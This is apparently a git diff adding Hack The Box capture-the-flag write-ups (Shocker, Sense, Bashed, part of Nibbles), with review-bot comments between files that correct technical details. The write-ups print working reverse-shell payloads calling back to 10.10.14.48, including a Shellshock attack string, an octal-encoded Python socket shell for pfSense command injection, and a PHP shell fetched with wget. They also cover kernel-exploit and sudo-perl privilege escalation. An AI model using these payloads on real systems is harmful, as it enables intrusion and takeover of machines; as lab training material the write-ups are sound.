+ shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash
+
+ [+] The following URLs appear to be exploitable:
+ [1] http://10.10.10.56:80/cgi-bin/user.sh
+ [+] Would you like to exploit further?
+ [>] Enter an URL number or 0 to exit: 0
+
+
+Our exploit worked ! we have been able to print out the contents of the /etc/passwd file. Now let's try to see if we can get a reverse shell connection on our 1337th port. We start by using the **netcat** command ready with the -lvnp flags to catch the incoming connection, within a second terminal.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → nc -lvnp 1337
+
+
+Now all we have to do is use the previous shocker python script to tell the machine to send us a reverse shell connection on the correct port.
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Shocker] → python2 shocker.py -H 10.10.10.56 --command "/bin/bash -i > /dev/tcp/10.10.14.48/1337 0<&1 2>&1" -c /cgi-bin/user.sh --verbose
+
+ .-. . .
+ ( )| |
+ `-. |--. .-. .-.|.-. .-. .--.
+ ( )| |( )( |-.'(.-' |
+ `-' ' `-`-' `-'' `-`--' v1.1
+
+ Tom Watson, tom.watson@nccgroup.trust
+ https://www.github.com/nccgroup/shocker
+
+ Released under the GNU Affero General Public License
+ (https://www.gnu.org/licenses/agpl-3.0.html)
+
+
+ [+] Single target '/cgi-bin/user.sh' being used
+ [+] Checking connectivity with target...
+ [I] Checking to see if 10.10.10.56 resolves...
+ [I] Resolved ok
+ [I] Checking to see if 10.10.10.56 is reachable on port 80...
+ [I] 10.10.10.56 seems reachable...
+ [+] Target was reachable
+ [+] Looking for vulnerabilities on 10.10.10.56:80
+ [I] Starting thread 1
+ [+] Finished host scan
+ [+] 1 potential target found, attempting exploits
+ [+] Trying exploit for http://10.10.10.56:80/cgi-bin/user.sh
+ [I] Flag set to: ZS6W4FQLEFG9B7NYE0K9
+ [I] Header is: Content-type
+ [I] Attack string is: () { :;}; echo; echo ZS6W4FQLEFG9B7NYE0K9; /bin/bash -i > /dev/tcp/10.10.14.48/1337 0<&1 2>&1
+ [I] http://10.10.10.56:80/cgi-bin/user.sh - timed out
+ [-] Not vulnerable
+ [-] All exploit attempts failed
+
+
+The script tells us that it seems to have failed, Although it seems like our second terminal recieved the connection through the 1337 port.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → nc -lvnp 1337
+ Connection from 10.10.10.56:38116
+ bash: no job control in this shell
+
+ shelly@Shocker:/usr/lib/cgi-bin$ whoami
+ shelly
+
+ shelly@Shocker:/usr/lib/cgi-bin$ uname -a
+ uname -a
+ Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+
+ shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt
+ cat /home/shelly/user.txt
+ 2eXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+That's how you get the user flag ! Now let's try to escalate privileges onto the box.
+
+## **Part 3 : Getting Root Access**
+
+First of all let's type the **sudo -l** command to see which commands could potentially be run as the root user.
+
+
+ shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
+ sudo -l
+
+ Matching Defaults entries for shelly on Shocker:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User shelly may run the following commands on Shocker:
+ (root) NOPASSWD: /usr/bin/perl
+
+
+Seems like the perl command can be run as root ! let's test it.
+
+
+ shelly@Shocker:/usr/lib/cgi-bin$ sudo perl -e 'exec "/bin/sh";'
+ sudo perl -e 'exec "/bin/sh";'
+
+ whoami
+ root
+
+
+And that's it ! we now have an elevated privilege shell as the root user. All that's left to do now is to print the root flag.
+
+
+ cat /root/root.txt
+ 52XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
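Review bot: the reverse-shell run ends in "timed out" / "Not vulnerable" and the text leaves that unexplained; it is a false negative, the injected `bash -i` keeps the CGI process alive so the HTTP response never completes and shocker.py gives up, while the shell has already connected. Append `&` to the command (the 34900.py payload does exactly this with `0>&1 &`) and say why, otherwise readers will think the exploit failed. In the dirb section, `-w` means "don't stop on warnings" (the listing confirms it: "OPTION: Not Stoping on warning messages"), the path after it is never used as a wordlist and `WORDLIST_FILES` still shows the default, so the wget of the dirbuster-ng common.txt is dead weight; either drop it or pass the file positionally, `dirb http://10.10.10.56/cgi-bin/ ./common.txt -X .sh`. Consistency: dirb found 3 entries, not 2, the tool is dirb not "Dirbuster", and `index.md` with SIZE:137 is the index page the curl returned with Content-Length 137, so the `.md` looks like the HTML-to-markdown rename leaking into a listing. The curl HTML is mangled (`<****!DOCTYPE html>`, `** h2>`), and the `**` around the 34900 searchsploit row and the flag render literally in indented code. The 34900.py listing lost all indentation, so it cannot be pasted and run, and its usage line needs `pages=/cgi-bin/user.sh` because `c.request("GET", page, ...)` sends the value as the request target. The "shellshock CVE" is mentioned but never named; it is CVE-2014-6271. Typos: "recieved", "1337th port", "doesnt"; the progress-graph paragraph has no image.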
diff --git a/Easy/14.md b/Easy/14.md
new file mode 100644
index 0000000..b535c10
--- /dev/null
+++ b/Easy/14.md
@@ -0,0 +1,157 @@
+# Sense Writeup
+
+
+
+## Introduction :
+
+Sense is an easy FreeBSD box that was released back in October 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.60
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 13:32 CET
+ Nmap scan report for 10.10.10.60
+ Host is up (0.13s latency).
+ Not shown: 998 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http lighttpd 1.4.35
+ |_http-server-header: lighttpd/1.4.35
+ |_http-title: Did not follow redirect to https://10.10.10.60/
+ |_https-redirect: ERROR: Script execution failed (use -d to debug)
+ 443/tcp open ssl/http lighttpd 1.4.35
+ |_http-server-header: lighttpd/1.4.35
+ |_http-title: Login
+ | ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
+ | Not valid before: 2017-10-14T19:21:35
+ |_Not valid after: 2023-04-06T19:21:35
+ |_ssl-date: TLS randomness does not represent time
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 44.03 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up that the 80th port was opened. let's open see what lies at the corresponding URL within a web browser.
+
+
+
+Seems like we are greeted with a pfSense login page. We are going to run a dirbusting command to enumerate the directories available on the webservice.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → gobuster -w /usr/wordlists/directory.txt -u http://10.10.10.60/ -x php,txt,cnf,conf
+
+
+Gobuster found the cmd.txt, system.txt and changelog.txt
+
+
+
+Navigating to the system-users.txt we seem to have a username to work with. We'll test if we can log in using the default credentials **rohit:pfsense**
+
+
+
+And we are logged in ! We see that the system is running FreeBSD 8.3-RELEASE-p16 with an outdated 2.1.3-RELEASE amd64 pfSense, by running a quick searchsploit command with the keywords pfsense 2.1 we see that the service may be vulnerable to Command Injections.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Sense 2.1
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ pfSense 2.1 build 20130911-1816 - Directory Traversal | exploits/php/webapps/31263.txt
+ pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | exploits/php/webapps/43560.py
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+Let's first locate the exploit n°43560 on our system and copy it to our current directory.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → locate 43560.py
+ /usr/share/exploitdb/exploits/php/webapps/43560.py
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → cp /usr/share/exploitdb/exploits/php/webapps/43560.py .
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → nano 43560.py
+
+
+looking at the exploit made by [absolomb](https://www.absolomb.com/), we see that the exploit is supposed to exploit a command Injection Vulnerability that can be found within the status_rrd_graph_img php file onto the pfsense webservice. We will need to pass it the --rhost , --lhost, --lport, --username, --password flags.
+
+## **Part 3 : Getting Root Access**
+
+Within the exploit the main lines are the following :
+
+
+ payload = ""
+
+ # encode payload in octal
+ for char in command:
+ payload += ("\\" + oct(ord(char)).lstrip("0o"))
+
+ exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"
+
+
+the exploit starts to browse at the url https://10.10.10.60/status_rrd_graph_img.php?database=queues; and from there starts the Command Execution Vulnerability, and we choose whatever command we need to execute. One thing to note though is that the command should be passed onto the URL with an Octal encoded string. rather than attempting to pass it as plain text, if we isolate the octal conversion part it looks like this :
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → cat exploit.py
+ #!/usr/bin/env python3
+
+ command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.48',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i'];'"
+
+ payload = ""
+
+ for char in command:
+ payload += ("\\" + oct(ord(char)).lstrip("0o"))
+
+ print(payload)
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → python exploit.py
+ \160\171\164\150\157\156\40\55\143\40\47\151\155\160\157\162\164\40\163\157\143\153\145\164\54\163\165\142\160\162\157\143\145\163\163\54\157\163\73\163\75\163\157\143\153\145\164\56\163\157\143\153\145\164\50\163\157\143\153\145\164\56\101\106\137\111\116\105\124\54\163\157\143\153\145\164\56\123\117\103\113\137\123\124\122\105\101\115\51\73\163\56\143\157\156\156\145\143\164\50\50\47\61\60\56\61\60\56\61\64\56\61\60\47\54\64\64\63\51\51\73\157\163\56\144\165\160\62\50\163\56\146\151\154\145\156\157\50\51\54\60\51\73\40\157\163\56\144\165\160\62\50\163\56\146\151\154\145\156\157\50\51\54\61\51\73\40\157\163\56\144\165\160\62\50\163\56\146\151\154\145\156\157\50\51\54\62\51\73\160\75\163\165\142\160\162\157\143\145\163\163\56\143\141\154\154\50\133\47\57\142\151\156\57\163\150\47\54\47\55\151\47\135\73\47
+
+
+
+Now before we run the python script, we ready our terminal with the nc command with the -lvnp flags in order to catch the incoming reverse shell onto the corresponding port.
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Sense] → nc -lvnp 9001
+
+
+_Terminal 2:_
+
+
+ python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.48 --lport 9001 --username rohit --password pfsense
+ CSRF token obtained
+ Running exploit...
+ Exploit completed
+
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → nc -lvnp 9001
+ Connection from 10.10.10.60:34128
+ sh: cant access tty; job control turned off
+ # id
+ uid=0(root) gid=0(wheel) groups=0(wheel)
+ # cat /root/root.txt
+ d0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+ # cat /home/rohit/user.txt
+ 87XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! The exploit spawned a root shell for us, and we have been able to print both the root and the user flags.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
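Review bot: the standalone exploit.py shown for the octal encoding does not run as listed: `command` nests single quotes inside single quotes, so a shell would split the `python -c` argument at `('10.10.14.48'`, and `subprocess.call(['/bin/sh','-i']` is missing its closing `)` (the encoded output ends `\135\73\47`, i.e. `];'`, so the defect is in the listing, not a transcription slip). It also calls back to port 443 while the listener and the real 43560.py run use 9001. Use double quotes for the inner strings and close the call, or point the reader at the `--lhost/--lport` path and drop the hand-rolled command. The paragraph also says the command "should be" octal-encoded without saying why; state what the `printf '\NNN...'|sh` trick buys, namely that none of the command's quotes, spaces or slashes ever appear in the query string, only digits, backslashes and `printf`/`|sh`. Smaller points: the gobuster step shows no output and the filenames disagree ("system.txt" versus "system-users.txt"), the searchsploit command is `Sense 2.1` while the text says `pfsense 2.1`, every screenshot referenced (login page, gobuster result, system-users.txt, dashboard, progress graph) is missing, and `cant` in the nc banner should read `can't`.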
diff --git a/Easy/15.md b/Easy/15.md
new file mode 100644
index 0000000..d88e63a
--- /dev/null
+++ b/Easy/15.md
@@ -0,0 +1,286 @@
+# Bashed Writeup
+
+
+
+## Introduction :
+
+Bashed is an easy Linux box that was released back in December 2017
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.68
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 10:34 CET
+ Nmap scan report for 10.10.10.68
+ Host is up (0.073s latency).
+ Not shown: 999 closed ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Arrexels Development Site
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds
+
+
+## **Part 2 : Getting User Access**
+
+We see that the box has it's 80th port opened. We will run the dirb command to list the directories onto the webserver.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.68/
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Thu Nov 21 10:44:45 2019
+ URL_BASE: http://10.10.10.68/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.68/ ----
+ ==> DIRECTORY: http://10.10.10.68/css/
+ ==> DIRECTORY: http://10.10.10.68/dev/
+
+
+Dirbuster found the /dev directory , let's browse to it to see what it contains.
+
+
+
+We navigate to the phpbash.php page and we are greeted by a shell session that has the user privileges.
+
+
+
+And that's how you get the User flag ! Now we will try to spawn a reverse shell to see if we can escalate privileges.
+
+## **Part 3 : Getting Root Access**
+
+We will first off all upload a reverse shell written in php, in order to attempt to send a reverse shell connection to our machine.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nano rev.php
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → cat rev.php
+ & /dev/tcp/10.10.14.48/9001 0>&1'");
+ ?>
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80
+ Serving HTTP on 0.0.0.0 port 80 ...
+
+
+We will be using the wget command on the phpbash shell in order to download our reverse php shell named rev.php
+
+
+ www-data@bashed
+ :/home/arrexel# wget http://10.10.14.48/rev.php
+
+ --2019-11-21 02:34:48-- http://10.10.14.48/rev.php
+ Connecting to 10.10.14.48:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 75 [application/octet-stream]
+ rev.php: Permission denied
+
+ Cannot write to 'rev.php' (Success).
+ www-data@bashed:/home/arrexel# ls
+
+ user.txt
+
+
+we need to download the reverse php shell into a directory where we have the writing rights.
+
+
+ www-data@bashed:/home/arrexel# cd /var/www/html
+
+ www-data@bashed:/var/www/html# cd uploads
+
+ www-data@bashed:/var/www/html/uploads# ls
+
+ index.html
+
+ www-data@bashed:/var/www/html/uploads# wget http://10.10.14.48/rev.php
+
+ --2019-11-21 02:35:39-- http://10.10.14.48/rev.php
+ Connecting to 10.10.14.48:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 75 [application/octet-stream]
+ Saving to: 'rev.php'
+
+ 0K 100% 8.89M=0s
+
+ 2019-11-21 02:35:39 (8.89 MB/s) - 'rev.php' saved [75/75]
+
+ www-data@bashed:/var/www/html/uploads# ls
+
+ index.html
+ rev.php
+
+
+Let's browse to our reverse shell file and We will be using the nc command with the -lvnp flags in order to catch the incoming reverse shell connection at our 9001 port.
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → curl -vsk http://10.10.10.68/uploads/rev.php
+ * Trying 10.10.10.68:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.68 (10.10.10.68) port 80 (#0)
+ > GET /uploads/rev.php HTTP/1.1
+ > Host: 10.10.10.68
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+
+
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001
+ Connection from 10.10.10.68:44622
+ bash: cannot set terminal process group (753): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@bashed:/var/www/html/uploads$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@bashed:/var/www/html/uploads$
+
+
+We have been able to get our reverse shell ! we are logged in as www-data.
+
+
+ www-data@bashed:/var/www/html/uploads$ sudo -l
+ sudo -l
+ Matching Defaults entries for www-data on bashed:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User www-data may run the following commands on bashed:
+ (scriptmanager : scriptmanager) NOPASSWD: ALL
+
+
+running the sudo command with the -l flag we see that the scriptmanager script can be run as root without any password.
+
+
+ www-data@bashed:/var/www/html/uploads$ uname -a
+ uname -a
+ Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+
+
+running the uname command with the -a flag we see that the machine is running an outdated kernel version (4.4) we run a quick searchsploit command to try to find out local exploits for us to use.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → searchsploit kernel 4.4
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privil | exploits/linux/local/19933.rb
+ Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/ | exploits/linux_x86/local/9542.c
+ Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corrupti | exploits/linux/dos/39545.txt
+ Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasp | exploits/linux/local/40759.rb
+ Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Poin | exploits/linux/dos/46529.c
+ Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure | exploits/linux/local/46006.c
+ Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Conditio | exploits/linux_x86-64/local/40871.c
+ Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC) | exploits/linux/dos/41457.c
+ Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c
+ Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of- | exploits/linux_x86-64/local/40049.c
+ Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' | exploits/linux/local/47170.c
+ Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Pr | exploits/linux/local/39277.c
+ Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Pr | exploits/linux/local/40003.c
+ Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Pr | exploits/linux/local/39772.txt
+ Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation | exploits/arm/local/31574.c
+
+ **Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c**
+
+ Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Loc | exploits/linux/local/44300.c
+ Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privileg | exploits/linux/local/43418.c
+ Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zor | exploits/linux/local/47169.c
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+Seems like the exploit n°44298 is a good candidate, we first locate it and then copy it to our current directory
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → locate 44298.c
+ /home/nihilist/_HTB/Bashed/44298.c
+ /usr/share/exploitdb/exploits/linux/local/44298.c
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → cp /usr/share/exploitdb/exploits/linux/local/44298.c .
+
+
+Now that we have the exploit written in C, we are going to use the gcc command compile the script into an executable binary
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → gcc -o 44298 -m64 44298.c
+
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → ls
+ 44298 44298.c progress.graphml rev.php
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80
+ Serving HTTP on 0.0.0.0 port 80 ...
+
+
+Back to our reverse shell connection as www-data, we will use the wget command once again to download our executable named 44298.
+
+
+ www-data@bashed:/var/www/html/uploads$ wget http://10.10.14.48/44298
+ wget http://10.10.14.48/44298
+ --2019-11-21 02:54:01-- http://10.10.14.48/44298
+ Connecting to 10.10.14.48:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 17872 (17K) [application/octet-stream]
+ Saving to: '44298'
+
+ 0K .......... ....... 100% 206K=0.08s
+
+ 2019-11-21 02:54:02 (206 KB/s) - '44298' saved [17872/17872]
+
+
+
+let's execute our binary file and see if we can escalate privileges.
+
+
+ www-data@bashed:/var/www/html/uploads$ ./44298
+ ./44298
+ bash: ./44298: Permission denied
+
+
+We need to change permissions on our binary in order to execute it using the chmod command.
+
+
+ www-data@bashed:/var/www/html/uploads$ chmod 775 44298
+ chmod 775 44298
+ www-data@bashed:/var/www/html/uploads$ ./44298
+ ./44298
+ whoami
+ root
+ id
+ uid=0(root) gid=0(root) groups=0(root),33(www-data)
+ cat /root/root.txt
+ ccXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! Our binary exploit gave us an escalation of privileges, therefore we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
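Review bot: the reading of the `sudo -l` output at "running the sudo command with the -l flag we see that the scriptmanager script can be run as root without any password" is wrong. The rule `(scriptmanager : scriptmanager) NOPASSWD: ALL` means www-data may run any command as the user and group scriptmanager without a password; there is no script called scriptmanager and nothing in that line runs as root. The consequence of the rule is `sudo -u scriptmanager <command>` and further enumeration as that user, while the text jumps straight to a kernel exploit instead, so either correct the sentence or say explicitly that the sudo path is being set aside in favour of 44298.c (which is a fair choice, since `4.4.0-62` is below the `< 4.4.0-116` range the searchsploit entry gives). Two smaller points in the same hunk: the `cat rev.php` listing is truncated to `& /dev/tcp/10.10.14.48/9001 0>&1'");` because the `<?php` opening and the redirection before it were swallowed by the markdown renderer; put the file in a code fence or escape it so the 75-byte payload that wget reports is actually visible. And `chmod 775 44298` is broader than needed for a file sitting in the web root; `chmod 700` is enough to execute it and does not hand execute rights to every other user on the box. Minor: the tool run is dirb, not Dirbuster.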
diff --git a/Easy/16.md b/Easy/16.md
new file mode 100644
index 0000000..91d3b4a
--- /dev/null
+++ b/Easy/16.md
@@ -0,0 +1,296 @@
+# Nibbles Writeup
+
+
+
+## Introduction :
+
+Nibbles is an easy Linux Box that was released back in January 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.75
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 09:16 CET
+ Nmap scan report for 10.10.10.75
+ Host is up (0.081s latency).
+ Not shown: 998 closed ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
+ | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
+ |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Site doesnt have a title (text/html).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 12.83 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+The previous nmap scan seems to have found a web service running at the 80th port. Let's see what lies at the http://10.10.10.75/ URL using the curl command with the -vsk flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.75/
+ * Trying 10.10.10.75:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.75 (10.10.10.75) port 80 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.75
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 200 OK
+ < Date: Thu, 21 Nov 2019 08:23:50 GMT
+ < Server: Apache/2.4.18 (Ubuntu)
+ < Last-Modified: Thu, 28 Dec 2017 20:19:50 GMT
+ < ETag: "5d-5616c3cf7fa77"
+ < Accept-Ranges: bytes
+ < Content-Length: 93
+ < Vary: Accept-Encoding
+ < Content-Type: text/html
+ <
+ **Hello world!**
+
+
+ <****!-- /nibbleblog/ directory. Nothing interesting here! -->
+ * Connection #0 to host 10.10.10.75 left intact
+
+It seems like there is a comment at the bottom of the page that refers to a directory named "nibbleblog" Let's run the dirb command to see what interesting files we could find in this directory.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.75/nibbleblog/
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Thu Nov 21 09:27:27 2019
+ URL_BASE: http://10.10.10.75/nibbleblog/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.75/nibbleblog/ ----
+ ==> DIRECTORY: http://10.10.10.75/nibbleblog/admin/
+ + http://10.10.10.75/nibbleblog/admin.php (CODE:200|SIZE:1401)
+
+
+Dirbuster seems to have found the admin.php page ! We browse to the URL to see what we're dealing with.
+
+
+
+This login page has been misconfigured because fuzzing just a little with the possible default credentials we find that **"admin:nibbles"** is actually able to log us in !
+
+
+
+navigating to the Settings page we see that we're dealing with Nibbleblog 4.0.3 "Coffee" Let's run a quick searchsploit command to try to find out which exploits we could use onto the machine.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Nibbleblog 4.0.3
+ -------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ -------------------------------------------------------------- ----------------------------------------
+ Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
+ -------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+There seems to be a metasploit script for us to use, that take advantage of an Arbitrary File Upload vulnerability. Let's fire up msfconsole and choose the according script.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → msfconsole
+ [-] ***rtinG the Metasploit Framework console...\
+ [-] * WARNING: No database support: No database YAML file
+ [-] ***
+
+ , ,
+ / \
+ ((__---,,,---__))
+ (_) O O (_)_________
+ \ _ / |\
+ o_o \ M S F | \
+ \ _____ | *
+ ||| WW|||
+ ||| |||
+
+
+ =[ metasploit v5.0.60-dev ]
+ + -- --=[ 1947 exploits - 1089 auxiliary - 333 post ]
+ + -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 7 evasion ]
+
+ msf5 > search nibbleblog 4.0.3
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/dos/android/android_stock_browser_iframe 2012-12-01 normal No Android Stock Browser Iframe DOS
+ 1 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
+
+
+ msf5 > use exploit/multi/http/nibbleblog_file_upload
+ msf5 exploit(multi/http/nibbleblog_file_upload) > show options
+
+ Module options (exploit/multi/http/nibbleblog_file_upload):
+
+ Name Current Setting Required Description
